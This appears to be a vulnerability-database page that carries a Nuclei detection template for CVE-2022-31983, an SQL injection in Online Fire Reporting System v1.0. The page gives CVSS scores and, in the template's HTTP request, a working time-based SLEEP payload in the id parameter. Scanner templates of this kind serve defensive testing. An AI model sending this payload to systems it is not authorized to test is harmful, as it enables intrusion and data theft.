Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-31983
HistoryJun 05, 2023 - 7:03 a.m.

Online Fire Reporting System v1.0 - SQL injection

2023-06-0507:03:16
ProjectDiscovery
github.com
3
cve2022
sqli
online-fire-reporting
online_fire_reporting_system_project
unauthorized-access
data-leakage
data-manipulation

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

0.001 Low

EPSS

Percentile

37.9%

Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=.
id: CVE-2022-31983

info:
  name: Online Fire Reporting System v1.0 - SQL injection
  author: theamanrawat
  severity: high
  description: |
    Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
  reference:
    - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-9.md
    - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31983
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/trhacknon/Pocingit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2022-31983
    cwe-id: CWE-89
    epss-score: 0.13959
    epss-percentile: 0.95665
    cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: online_fire_reporting_system_project
    product: online_fire_reporting_system
  tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "Request Detail")'
        condition: and
# digest: 490a0046304402204af8863950057b32e9684b9023e7884d1a76824a27e8591e296376788d9565e302202866cbbcb967e8a82db30b5e44ca11175311f2f73222aa124aafe5a17f3f4069:922c64590222798bb761d5b6d8e72950

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

0.001 Low

EPSS

Percentile

37.9%

Related for NUCLEI:CVE-2022-31983